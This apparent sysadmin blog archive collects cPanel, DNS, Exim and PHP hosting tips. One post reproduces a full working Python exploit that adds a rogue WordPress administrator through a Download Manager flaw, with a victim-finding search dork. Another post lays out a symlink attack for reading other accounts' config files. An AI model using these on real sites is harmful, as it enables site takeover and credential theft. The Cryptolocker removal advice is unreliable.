Tuesday, November 3, 2015

How can I put my email with one host and website with another

Nowadays there are a ton of options when researching what an “ideal” web hosting solution should be. You might find that you’ve outgrown your current platform, or perhaps you want something a bit simpler, like drag-and-drop page building, rather than teaching yourself HTML or CSS.
After you decide to take the plunge and switch hosting providers, you find yourself researching how to make the transition as smooth as possible. You’ve updated the “A records” to the servers’ new home and breathe a sigh of relief, only to realize that your inbox has gone silent and refuses to cooperate.
Doh! “What about the email servers? Do I have to switch email over to the new hosting provider?” you ask yourself. The answer is “no.” You can manage your email the way you always have, but your new hosting provider’s DNS needs to know where to find it.
Assuming you chose to keep your email provider (server) just the way it was and not migrate your email to your new hosting provider, there are key steps you must take to ensure your email stays intact while the website’s domain thrives in its new habitat.
What often happens is that the Mail Exchanger (MX) record points to yourdomain.com, but because you just changed yourdomain.com to point somewhere else (remember when you updated the A record so the web domain would have a new home?), @yourdomain.com no longer works for email.
No need to panic. You don’t have to be a DNS guru to split your email from your website hosting. It’s actually quite painless; read on…
So How Can I Keep My Email Provider Separate From Web Hosting Provider?
For those of us who don’t go under the DNS hood every day, there are two key pieces you need to know if you want your email provider to reside separately from your website hosting provider.
  1. The name server (the DNS server keeping track of the domain names and IP addresses) must know where the mail server lives. So we must define your “A (host) record” for mail, which we’ll explain in detail in a moment.
  2. The Internet must know where the email is being processed (this is the job of the MX record).
Let’s walk through a real world scenario:
Say you were using a hosting provider that also included email, but decided to switch to a different hosting company (e.g. Weebly*) and wanted to leave email with the current hosting company.
To accomplish this, you would change your A records for www.yourdomain.com (and the non-www version, yourdomain.com) to the IP address of your new hosting provider (which they provide), but don’t stop there. To ensure email works the way it always has, you must make sure mail.yourdomain.com still points to its existing IP address AND then change the MX record to point to mail.yourdomain.com.
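The scenario above boils down to one consistency rule: the MX target must keep its own A record, and that address must be the mail host's, not the new web host's. The shell function below is an added example, not part of the original post, that checks a zone for exactly that. It assumes a simplified one-record-per-line "name TYPE value" layout with constructed sample data (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges); a real zone file or `dig` answer section carries TTL and class fields too, so the field positions in the awk script would need adjusting.

```shell
#!/bin/sh
# Added example: verify that mail stays with the old host after the web A
# records were moved. Assumes a simplified "name TYPE value" layout
# (constructed data; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).

# Correct split: the website moved to 203.0.113.10, mail stayed on 198.51.100.25.
SPLIT_ZONE='yourdomain.com. A 203.0.113.10
www.yourdomain.com. A 203.0.113.10
mail.yourdomain.com. A 198.51.100.25
yourdomain.com. MX 10 mail.yourdomain.com.'

# The failure the post describes: the MX still names the apex, which now
# resolves to the new web host, so inbound mail follows the website.
BROKEN_ZONE='yourdomain.com. A 203.0.113.10
www.yourdomain.com. A 203.0.113.10
mail.yourdomain.com. A 198.51.100.25
yourdomain.com. MX 10 yourdomain.com.'

# check_mail_split ZONE_TEXT APEX
# Prints one finding and returns 0 only when the MX target has its own A
# record and that address differs from the website's A record.
check_mail_split() {
    printf '%s\n' "$1" | awk -v apex="$2" '
    $2 == "A"                { a[$1] = $3 }
    $2 == "MX" && $1 == apex { mx = $4 }
    END {
        if (mx == "")    { print "FAIL: no MX record for " apex; exit 1 }
        if (!(mx in a))  { print "FAIL: MX target " mx " has no A record"; exit 1 }
        if (a[mx] == a[apex]) {
            print "FAIL: mail and web both resolve to " a[mx] "; point MX at the mail host"
            exit 1
        }
        print "OK: MX " mx " -> " a[mx] ", web " apex " -> " a[apex]
    }'
}

demo() {
    check_mail_split "$SPLIT_ZONE" yourdomain.com.
    check_mail_split "$BROKEN_ZONE" yourdomain.com. || true
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

Run it with the argument `demo` to see one OK and one FAIL line. The check deliberately compares addresses rather than hostnames: an MX that names `mail.yourdomain.com` is still wrong if somebody also repointed the `mail` A record at the new web host.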
In your DNS Zone Editor Section, you can make updates to your DNS records.
Screenshot shows example IP addresses (be sure to use your own IP addresses accordingly):

Will this work on Email Hosted By Godaddy, InMotion, JustHost, or HostGator?
Yes – regardless of the email provider or web hosting provider, the rules described above are the same. DNS settings containing your A records and MX records are universal (if they weren’t, then the Internet would not have grown beyond a laboratory of a few computers).
How Long Does It Take Before I Start Seeing My Email Again?
After updating the MX record and A record, propagation (the fancy word that simply means “for the rest of the Internet to catch up”) can take as little as 3 hours but as many as 48 hours. It varies, so if you’re not seeing the results you expected, be sure to give it the full 48 hours.
Tip: You can check how other servers around the world are acknowledging your changes (DNS propagation) by using a free DNS checker found at http://www.whatsmydns.net/.


*If really using Weebly, keep in mind they don’t host email, and I advise against using their recommendation of the costly Google Apps that run $60/year per mailbox!

Thursday, August 13, 2015

Saturday, June 6, 2015

500 error with suphp configuration

Solution:

Add this to your .htaccess:

#Use PHP 5.4
# Use PHP54 as default
#AddHandler application/x-httpd-php54 .php
<IfModule mod_suphp.c>
    suPHP_ConfigPath /opt/php54/lib
</IfModule>


Wednesday, May 13, 2015

Reset or Set Default Permissions to Domain for Files and Directories in cPanel

If the permissions on files and folders in a domain's webroot are incorrect, more than likely you’ll get a server 500 error. Here is how to fix them by resetting to the correct defaults for a cPanel domain (or another web server): 755 for directories and 644 for files.


You can bulk fix these permissions on the command line with these commands:

Go to your webroot directory:

cd /home/yourdomain/public_html/

Fix the permissions on directories:

find . -type d -exec chmod 755 {} \;

Fix the permissions on files:

find . -type f -exec chmod 644 {} \;
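The two `find` commands are the whole fix, but resetting blindly also erases the evidence of what was wrong. The script below is an added example, not from the original post: it counts entries that are off the 755/644 defaults, lists anything world-writable first (the usual footprint of an upload script or a "chmod 777" fix), and then applies the defaults. The demo tree it builds in a temporary directory is constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post): reset a cPanel webroot to the
# default 755/644 permissions, but first show what was world-writable so the
# cause of the bad permissions is not simply papered over.

# Number of directories that are not 755 plus regular files that are not 644.
count_nondefault_perms() {
    d=$(find "$1" -type d ! -perm 755 | wc -l)
    f=$(find "$1" -type f ! -perm 644 | wc -l)
    echo $((d + f))
}

# Entries writable by "other": typically left behind by upload scripts or a
# chmod 777 "fix"; these deserve a look before being normalised away.
report_world_writable() {
    find "$1" \( -type d -o -type f \) -perm -o+w
}

# The two commands from the post, with "+" batching instead of one chmod per
# file. Symlinks are untouched because -type d / -type f do not match them.
reset_webroot_perms() {
    report_world_writable "$1"
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# Throwaway tree with deliberately wrong modes (constructed for the demo).
make_demo_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/public_html/wp-content/uploads"
    printf '<?php\n' > "$t/public_html/index.php"
    printf 'x\n'     > "$t/public_html/wp-content/uploads/note.txt"
    chmod 777 "$t/public_html/wp-content/uploads"
    chmod 666 "$t/public_html/wp-content/uploads/note.txt"
    chmod 600 "$t/public_html/index.php"
    echo "$t"
}

demo() {
    t=$(make_demo_tree)
    echo "before: $(count_nondefault_perms "$t/public_html") entries off default"
    reset_webroot_perms "$t/public_html"
    echo "after:  $(count_nondefault_perms "$t/public_html") entries off default"
    rm -rf "$t"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

On a real account, call `reset_webroot_perms /home/yourdomain/public_html` and keep the world-writable list it prints; a directory that keeps coming back as 777 usually has a plugin or cron job behind it.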

Sunday, May 10, 2015

Symlink find

find /home*/*/public_html -type l >> /root/symlinks.txt

Sunday, April 26, 2015

Cryptolocker Virus Removal


Restart your computer. Before the Windows interface loads, press the F8 key repeatedly. Select ‘Safe Mode with Networking’ and hit Enter. Or you can follow the steps below to get rid of the virus manually.
  • Open Windows Task Manager by pressing CTRL+ALT+DELETE or CTRL+SHIFT+ESC. Look for the Cryptolocker processes. Right-click to end them.
  • Go to the Start menu, click Control Panel and look for the Folder option. Now click on the View tab, tick Show Hidden Files and Folders and untick Hide Protected Operating System Files. Click OK.
  • Go to the Start menu and click Search Programs and Files. Look for the files created by Cryptolocker and delete them.
  • Open Registry Editor by pressing Windows+R; in the Run box, type regedit and hit OK.
  • Reboot your computer and you should find that the Cryptolocker virus has been removed.
Source : avstrike.com

Note: If you need more help, buy my gigs from here

Thursday, April 23, 2015

Find all SSH users besides you

To find all users besides you, use this command:

grep ssh /var/log/secure | grep Accepted
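Two greps tell you that logins happened, but not who came from where or how often. The following is an added example, not from the original post: it runs the same "Accepted" filter over constructed /var/log/secure lines (documentation IP ranges) and tallies logins by user, source address and authentication method, leaving out your own address; `foreign_root_logins` then gives the one number a defender wants to see at zero.

```shell
#!/bin/sh
# Added example (not from the original post): summarise accepted SSH logins
# from /var/log/secure, excluding your own source address. The log lines are
# constructed for this demo; the addresses are documentation ranges.

SECURE_LOG='Apr 23 09:12:01 host1 sshd[2201]: Accepted publickey for root from 198.51.100.7 port 51022 ssh2
Apr 23 09:15:44 host1 sshd[2310]: Failed password for invalid user admin from 203.0.113.9 port 40112 ssh2
Apr 23 09:16:02 host1 sshd[2311]: Accepted password for deploy from 203.0.113.9 port 40118 ssh2
Apr 23 10:01:17 host1 sshd[2402]: Accepted password for root from 203.0.113.9 port 40301 ssh2
Apr 23 10:05:00 host1 sshd[2450]: Accepted publickey for root from 198.51.100.7 port 51100 ssh2'

# accepted_logins LOG_TEXT SELF_IP
# Prints "user ip method count" for each accepted login not from SELF_IP,
# most frequent first. Pass "" as SELF_IP to see everything.
accepted_logins() {
    printf '%s\n' "$1" | awk -v me="$2" '
    /sshd\[[0-9]+\]: Accepted / {
        # ... Accepted <method> for <user> from <ip> port <n> ssh2
        for (i = 1; i <= NF; i++)
            if ($i == "Accepted") { method = $(i+1); user = $(i+3); ip = $(i+5) }
        if (ip != me) count[user " " ip " " method]++
    }
    END { for (k in count) print k, count[k] }' | sort -k4,4nr -k1,1
}

# Number of root logins that did not come from SELF_IP: the figure that
# should be zero on a box where only you hold the root key.
foreign_root_logins() {
    accepted_logins "$1" "$2" | awk '$1 == "root" { n += $4 } END { print n + 0 }'
}

demo() {
    echo "logins not from 198.51.100.7:"
    accepted_logins "$SECURE_LOG" 198.51.100.7
    echo "root logins from elsewhere: $(foreign_root_logins "$SECURE_LOG" 198.51.100.7)"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

Against a real server, replace the constructed text with `$(cat /var/log/secure)` or loop over the rotated copies too, since the interesting login is often in last week's file. Password logins for root from an unfamiliar address are the line to chase first; the "Failed" lines the filter skips are worth a separate count when that number is high.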

apache problem


If you have any Apache problem with lynx, just run this script and it will fix it all.

/scripts/upcp --force

Thursday, March 26, 2015

Exim Commands

Show the headers of a queued message by its message ID:

exim -Mvh 1YaOs6-0007Ol-ME

Saturday, March 21, 2015

Cpanel shows 500 error with php fatal

Updating your suPHP_ConfigPath value in your .htaccess file

Making your php.ini file affect all child folders as well is referred to as making the file "recursive". To make your public_html/php.ini file recursive, edit (or create the file if it doesn't exist) your public_html/.htaccess file and add the following code:
suPHP_ConfigPath /home/username/public_html

Friday, March 13, 2015

Enable SSH and WHM login Alert emails

Enable WHM login Alerts

You can enable this option in the CSF firewall configuration (/etc/csf/csf.conf), or in WHM >> Plugins >> ConfigServer Security & Firewall >> csf - ConfigServer Firewall; just click “Firewall Configuration”.
# Send an email alert if anyone accesses WHM via root. An IP address will be
# reported again 1 hour after the last tracked access (or if lfd is restarted)
LF_CPANEL_ALERT = "1"

Enable SSH login Alerts

Log in to your server as the root user:
cd /root
vi .bashrc
Scroll to the end of the file, then add the following:
echo 'ALERT - Root Shell Access (ServerName) on:' `date` `who` | mail -s "Alert: Root Access from `who | cut -d'(' -f2 | cut -d')' -f1`" your@yourdomain.com
Replace ServerName with the handle for your actual server.
Replace your@yourdomain.com with your actual email address.

Sunday, March 8, 2015

Exim Remove All messages From the Mail Queue

To print a list of the messages in the queue, enter:

# exim -bp

To remove a message from the queue, enter:

# exim -Mrm {message-id}

To remove all messages from the queue, enter:

# exim -bp | awk '/^ *[0-9]+[mhd]/{print "exim -Mrm " $3}' | bash

or

# exiqgrep -i | xargs exim -Mrm

(exiqgrep runs exim -bp itself, so nothing needs to be piped into it.)
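The awk one-liner above hands whatever it prints straight to bash, so a surprising line in the queue listing becomes a surprising command. The script below is an added example, not from the original post: it parses a constructed `exim -bp` listing into message IDs (optionally only frozen ones, which is what a queue full of bounce backscatter usually looks like) and prints the `exim -Mrm` commands for review before they are run.

```shell
#!/bin/sh
# Added example (not from the original post): turn "exim -bp" output into a
# reviewable list of message IDs before anything is removed. The queue listing
# below is constructed; real output has the same shape.

EXIM_QUEUE=' 25m  1.5K 1YaOs6-0007Ol-ME <sender@example.com>
          recipient@example.net

  3h   12K 1YaPz2-0001Xy-Ab <> *** frozen ***
          other@example.org

  2d   45K 1YaQr9-0002Cd-Ef <bounce@example.com> *** frozen ***
          someone@example.org'

# queue_ids QUEUE_TEXT [frozen]
# Prints one message ID per queued message; with "frozen" only frozen ones.
# Only header lines (age, size, id, sender) are considered, never recipients.
queue_ids() {
    printf '%s\n' "$1" | awk -v only="$2" '
    /^ *[0-9]+[mhd] / && $3 ~ /^[0-9A-Za-z]+-[0-9A-Za-z]+-[0-9A-Za-z]+$/ {
        if (only != "frozen" || /\*\*\* frozen \*\*\*/) print $3
    }'
}

# removal_commands QUEUE_TEXT [frozen]
# Emits "exim -Mrm ID" lines to inspect; pipe into sh only once reviewed.
removal_commands() {
    queue_ids "$1" "$2" | while IFS= read -r id; do
        printf 'exim -Mrm %s\n' "$id"
    done
}

demo() {
    echo "frozen messages:"; queue_ids "$EXIM_QUEUE" frozen
    echo "commands to review:"; removal_commands "$EXIM_QUEUE"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

On a live server the input is `"$(exim -bp)"`; look at the sender column of the frozen messages before removing anything, because a queue of thousands of `<>` bounces to one domain usually means a compromised account is still sending.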

Monday, March 2, 2015

Essential Linux Commands

How to see all folder permissions in Linux:

ls -l /home [home is the directory name]

Follow the Apache error log, filtered to one account (gemsandj here):

tail -f /usr/local/apache/logs/error_log | grep gemsandj

Find Apache logs:

tail -f /usr/local/apache/logs/error_log

http://thecpaneladmin.com/fix-account-permissions/

Apache start:

/etc/init.d/httpd start

Saturday, February 28, 2015

Move your forum to a new domain ;)

Hey there, do you need to move your current forum to a new domain, or do you want to copy an existing forum to a new domain?

If your answer is yes, then surely you can rely on me ;)

Because I am the right guy for it. Because I know how to do that without any data loss :)

Find me on Fiverr and hire me for your task :)

Good luck buddy :)

Monday, February 2, 2015

WP HTTP Error: Problem with the SSL CA cert

To resolve the issue, you’ll need to restart Apache (or nginx). If that doesn’t fix the problem, you’ll need to restart your entire server.

How to setup Zoho Mail to Bluehost

Yahoo, you will see many, many options. But actually it is very easy. Just look at the screenshot and do that for your expected domains...


Wednesday, January 28, 2015

How to change a domain nameserver from squarespace to bluehost.

Yesterday I had to change a domain nameserver from Squarespace to Bluehost. It took at least 4 hours to find out the way ...

Why?

Point 1: When I pointed the nameserver to Bluehost and tried to attach my domain, it showed verified but verification required.

Point 2: Squarespace is a prebuilt site like wix.com. So it has no upload option by which I can verify it.

Point 3: The other man who owned this domain before did not wish to give his password for the old hosting..

Point 4: But he wants to help me anyway ...

So what did I have to do ....

Just a trick ;) and it works perfectly ...


Monday, January 19, 2015

Increase Bandwidth for a domain

To increase the bandwidth you need to use WHM, not cPanel.

To do so go to your WHM Panel (http://serverhostname.com:2086) --> Limit Bandwidth Usage (under the 'Account Functions' section) --> Select the domain and press 'Limit' --> Increase the number and hit 'Change'

To make the domain have unlimited bandwidth, you can input 'unlimited' into the box and this will do this.

Hopefully that answers your question!

Sunday, January 18, 2015

How To Enable BoxTrapper In cPanel/WHM Server?

1) Login into WHM.
2) Click on Tweak Settings [see image below]


3) check/uncheck on BoxTrapper Spam Trap under email settings to enable/disable it. [see this image]

4) Save the settings.

That’s it!

How to enable SpamAssassin in cPanel/WHM

Spam filters are a very important part of any mail server. ServInt VPS accounts using the cPanel/WHM control panel come with SpamAssassin as part of the standard installation. The default configuration has SpamAssassin enabled.

If you need to reenable SpamAssassin:

  • In WHM, under Server Configuration on the top of the left-hand navigation bar, click on Tweak Settings.
  • Click the Mail tab. 
  • Select On for "Enable SpamAssassin spam filter."
Note: ServInt recommends leaving "Enable BoxTrapper spam trap" set to Off.

To force all the users on your VPS to use SpamAssassin:
  • Scroll down the left-hand navigation bar in WHM to Service Configuration and click on Exim Configuration Manager.
  • Select the SpamAssassin tab.
  • Set "Spam Assassin: Forced Global ON" to On
This will filter all of your email for spam.  It will not, however, force your users to do anything with it after it's filtered. It will simply mark spam as spam, nothing more.

cPanel temporary URL not working

When accessing the cPanel temporary URL, at times you get a 404 error, even if the cPanel account has been created and the website content uploaded to the server. Monitoring the Apache error log file shows an error like the one below.

File does not exist: /usr/local/apache/htdocs/~user

This happens when mod_userdir protection is enabled on the server. Apache’s mod_userdir allows users to view their sites by entering a tilde (~) and their username as the URL on a specific host. For example, http://server-ip/~user/ will bring up that user’s domain. The disadvantage of this feature is that any bandwidth used by this site will be charged to the domain it is accessed under (in this case test.domain.com). mod_userdir protection prevents this from happening. You may however want to disable it on specific virtual hosts (generally shared SSL hosts). For the temporary URL to work, the nobody user has to be excluded from the mod_userdir restriction.
Log in to WHM as root and open Security Center >> Apache mod_userdir Tweak. Uncheck DefaultHost (nobody) and click Save. Try accessing the temporary URL now.

Note: Just type "user" in the left-hand search field and you will get Apache mod_userdir ...

Wednesday, January 14, 2015

How to turn off php safe_mode off for a particular directory in a shared hosting environment?

Your service provider might have forgotten to tell you that you need to enable your user-defined php.ini configuration by adding this line to the .htaccess file in your public_html folder:

# Activates the php.ini config located in the main folder, recursively for all subfolders
suPHP_ConfigPath /home/YOUR_CPANEL_USER_NAME/public_html

Obviously replace YOUR_CPANEL_USER_NAME with your cPanel user name.
I'm supposing your server has the suPHP module (which is quite common nowadays).
BTW: the php.ini file needs to be in /home/YOUR_CPANEL_USER_NAME/public_html too, and inside you should write this:

safe_mode = Off

And remember that Safe Mode is deprecated in PHP 5.3.0 and is removed in PHP 6.0.0.
 

Saturday, January 10, 2015

Solutions for handling symlink attacks

1) He logs in to cPanel as a normal user at http://ip-address/cpanel, typing his login and password.
2) Then he opens File Manager (with hidden "dotfiles" shown) and creates a new .htaccess file with the following source:
#.htaccess file source
Options Indexes FollowSymLinks
DirectoryIndex doesnt-metter.htm
AddType txt .php
AddHandler txt .php

#End of .htaccess file
3) Then he creates a symbolic link (soft link) with Perl scripts, or just uses a cron job to create a symbolic link to the top-level directory "/", typing: "ln -s / topdir"
4) After that, he opens a browser, types http://server-ip/~his-home-dir/topdi.../wp-config.php and just looks at the source of the page; all data is present as TXT (text) data. That's all. The user has been hacked.
-------------------------------------------------------------------------------------------------------
Solution:
1) Open your php.conf with your favorite editor: nano /usr/local/apache/conf/php.conf
2) Comment out: #AddType application/x-httpd-php5 .php5 .php4 .php .php3 .php2 .phtml
3) Add these lines (the comment goes on its own line, because Apache does not accept a comment after a directive on the same line):
# this is equal to: .php, .php2, .php3, .php4, .php5, .php6, .phtml
<FilesMatch "\.ph(p[2-6]?|tml)$">
SetHandler application/x-httpd-php5
</FilesMatch>

4) Save your changes and close php.conf
5) Restart the httpd server by typing: /etc/init.d/httpd restart
6) Done
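The SetHandler fix stops a symlinked .php file from being served as text, but it does not tell you which accounts already contain such links. The script below is an added example, not from the original post, that pairs the `find ... -type l` sweep from the "Symlink find" entry above with the check that matters here: it resolves every symlink under an account and reports the ones whose target lies outside that account, such as `ln -s / topdir` or a link into a neighbour's home. The account layout it builds in a temporary directory is constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original post): list symlinks under an account
# that resolve outside it. Combines the "find ... -type l" sweep with the check
# that matters for the attack above, namely a link such as "ln -s / topdir".

# Canonical absolute target of symlink $1 (nested links are followed via cd -P).
# Dangling links yield an empty path and are therefore reported as escaping.
link_target_abs() {
    tgt=$(readlink "$1")
    case "$tgt" in /*) ;; *) tgt="$(dirname "$1")/$tgt" ;; esac
    if [ -d "$tgt" ]; then
        (cd -P "$tgt" 2>/dev/null && pwd -P)
    else
        (cd -P "$(dirname "$tgt")" 2>/dev/null && printf '%s/%s\n' "$(pwd -P)" "$(basename "$tgt")")
    fi
}

# escaping_symlinks ROOT
# Prints "link -> target" for every symlink below ROOT whose target is not
# inside ROOT. Links that stay within the account are silent.
escaping_symlinks() {
    root=$(cd -P "$1" && pwd -P)
    find "$root" -type l | while IFS= read -r link; do
        target=$(link_target_abs "$link")
        case "$target" in
            "$root"|"$root"/*) ;;
            *) printf '%s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# Constructed account layout: one harmless internal link, one link to "/",
# and one that reaches into a neighbouring account.
make_symlink_demo() {
    t=$(mktemp -d)
    mkdir -p "$t/home/alice/public_html/img" "$t/home/bob"
    ln -s img "$t/home/alice/public_html/images"
    ln -s / "$t/home/alice/public_html/topdir"
    ln -s ../../bob "$t/home/alice/public_html/other"
    echo "$t"
}

demo() {
    t=$(make_symlink_demo)
    escaping_symlinks "$t/home/alice"
    rm -rf "$t"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

For a whole cPanel box, loop `for h in /home/*; do escaping_symlinks "$h"; done` and append the output to the symlinks.txt file from the earlier entry; the internal links that WordPress and cache plugins create stay out of the report, so what remains is short enough to read by hand.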

Friday, January 9, 2015

How do I fix the error “Mysql Server has gone away”?

The “MySQL server has gone away” error (error 2006) has two main causes and solutions:
  • The server timed out and closed the connection. To fix, check that the “wait_timeout” MySQL variable in your my.cnf configuration file is large enough.
  • The server dropped an incorrect or too-large packet. If mysqld gets a packet that is too large or incorrect, it assumes that something has gone wrong with the client and closes the connection. To fix, you can increase the maximum packet size limit “max_allowed_packet” in the my.cnf file, e.g. set max_allowed_packet = 128M, then sudo /etc/init.d/mysql restart.
For WAMP, you have to check my.ini under bin > mysql in the WAMP folder.

Wednesday, January 7, 2015

Check for old plugins with exploit database...

Exploit Database :

http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=wordpress&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_exploit_text=&filter_port=0&filter_osvdb=&filter_cve=


CVE :

http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/Wordpress-Wordpress.html


WP SCAN

https://wpvulndb.com/ 

http://www.wordpressexploit.com/

http://wpsecure.net/





Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability

#!/usr/bin/python
#
# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
#
# Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
#
# Exploit written by Claudio Viviani
#
#
# 2014-12-03:  Discovered vulnerability
# 2014-12-04:  Patch released (2.7.5)
#
# Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
#
# --------------------------------------------------------------------
#
# The vulnerable function is located on "/download-manager/wpdm-core.php" file:
#
# function wpdm_ajax_call_exec()
# {
#    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
#         if (function_exists($_POST['execute']))
#             call_user_func($_POST['execute'], $_POST);
#         else
#             echo "function not defined!";
#         die();
#     }
# }
#
# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).
# wpdm_ajax_call_exec() call functions by call_user_func() through POST data:
#
#         if (function_exists($_POST['execute']))
#             call_user_func($_POST['execute'], $_POST);
#         else
#         ...
#         ...
#         ...
#
# $_POST data needs to be an array
#
#
# The wordpress function wp_insert_user is perfect:
#
# http://codex.wordpress.org/Function_Reference/wp_insert_user
#
# Description
#
# Insert a user into the database.
#
# Usage
#
# <?php wp_insert_user( $userdata ); ?>
#
# Parameters
#
# $userdata
#     (mixed) (required) An array of user data, stdClass or WP_User object.
#        Default: None
#
#
#
# Evil POST Data (Add new Wordpress Administrator):
#
# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
#
# ---------------------------------------------------------------------
#
# Dork google:  index of "wordpress-download"
#
# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
 
# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
 
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
 
banner = """
    ___ ___               __
   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|
   |:      |    ______      |__|              __                __
   |::.|:. |   |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |
   `--- ---'   |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |
               |.  |    |_____|________|__|__|__|_____|___._|_____|
               |:  1    /   ___ ___
               |::.. . /   |   Y   .---.-.-----.---.-.-----.-----.----.
               `------'    |.      |  _  |     |  _  |  _  |  -__|   _|
                           |. \_/  |___._|__|__|___._|___  |_____|__|
                           |:  |   |                 |_____|
                           |::.|:. |
                           `--- ---'
                                                   Wordpress Download Manager
                                                      R3m0t3 C0d3 Ex3cut10n
                                                         (Add WP Admin)
                                                          v2.7.0-2.7.4
 
                               Written by:
 
                             Claudio Viviani
 
                          http://www.homelab.it
 
                             info@homelab.it
                         homelabit@protonmail.ch
 
                   https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                    https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )
 
options, remainder = commandList.parse_args()
 
# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
host = checkurl(options.target)
timeout = options.timeout
 
print(banner)
 
socket.setdefaulttimeout(timeout)
 
username = id_generator()
pwd = id_generator()
 
body = urllib.urlencode({'action' : 'wpdm_ajax_call',
                         'execute' : 'wp_insert_user',
                         'user_login' : username,
                         'user_pass' : pwd,
                         'role' : 'administrator'})
 
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
 
print "[+] Tryng to connect to: "+host
try:
    req = urllib2.Request(host+"/", body, headers)
    response = urllib2.urlopen(req)
    html = response.read()
 
    if html == "":
       print("[!] Account Added")
       print("[!] Location: "+host+"/wp-login.php")
       print("[!] Username: "+username)
       print("[!] Password: "+pwd)
    else:
       print("[X] Exploitation Failed :(")
 
except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))

Find vulnerable timthumb scripts all over the server

find . -name "*thumb.php" -exec grep -H -n 'WEBSHOT_ENABLED' {} \;

or

find / -name '*.php' -exec grep WEBSHOT_ENABLED {} \;


To secure it, use:

define ('WEBSHOT_ENABLED', false);
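The grep above lists every file that mentions WEBSHOT_ENABLED, including the ones already set to false. The script below is an added example, not from the original post: it narrows the sweep to `*thumb.php` files whose define is still `true` and rewrites that define to `false`, keeping a `.bak` copy. It assumes the define is written on one line as `define('WEBSHOT_ENABLED', true)` with either quote style and any spacing; the sample files are constructed. Flipping the flag is a stopgap for a library that is no longer maintained, so removing or replacing the timthumb copies is the durable fix.

```shell
#!/bin/sh
# Added example (not from the original post): find timthumb copies whose
# WEBSHOT_ENABLED define is true and flip it to false. Assumes the define sits
# on one line as define('WEBSHOT_ENABLED', true); sample files are constructed.

# Paths of *thumb.php files under $1 that still have webshots enabled.
# A find/grep that matches nothing exits non-zero, which is not an error here.
webshot_enabled_files() {
    find "$1" -type f -name '*thumb.php' \
        -exec grep -l -E "define *\( *['\"]WEBSHOT_ENABLED['\"] *, *true" {} + || true
}

# Rewrite the define in place, keeping a .bak copy as the change record.
# sed -E is used so the same pattern works on GNU and BSD sed.
disable_webshot() {
    cp "$1" "$1.bak"
    sed -E "s/(define *\( *['\"]WEBSHOT_ENABLED['\"] *, *)true/\1false/" "$1.bak" > "$1"
}

# Constructed theme tree: one enabled copy, one already disabled, and one
# enabled file whose name is outside the *thumb.php pattern the post uses.
make_timthumb_demo() {
    t=$(mktemp -d)
    mkdir -p "$t/theme-a/inc" "$t/theme-b"
    printf '<?php\ndefine ("WEBSHOT_ENABLED", true);\n'  > "$t/theme-a/inc/timthumb.php"
    printf '<?php\ndefine ("WEBSHOT_ENABLED", false);\n' > "$t/theme-b/thumb.php"
    printf '<?php\ndefine ("WEBSHOT_ENABLED", true);\n'  > "$t/theme-b/unrelated.php"
    echo "$t"
}

demo() {
    t=$(make_timthumb_demo)
    echo "enabled before:"; webshot_enabled_files "$t"
    webshot_enabled_files "$t" | while IFS= read -r f; do disable_webshot "$f"; done
    echo "enabled after:";  webshot_enabled_files "$t"
    rm -rf "$t"
}

if [ "${1:-}" = "demo" ]; then demo; fi
```

Note that the demo's `unrelated.php` is left alone on purpose: it shows why the second, broader `find / -name '*.php'` command in the post is still worth running once, since renamed copies of the library escape the `*thumb.php` filter.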

Saturday, January 3, 2015

Clamav Commands 4.1.2015

Terminal

At first you have to update the virus definitions with:
sudo freshclam
Then you can scan for viruses.
 clamscan OPTIONS File/Folder 
If necessary start with root permissions: sudo clamscan.
Examples:
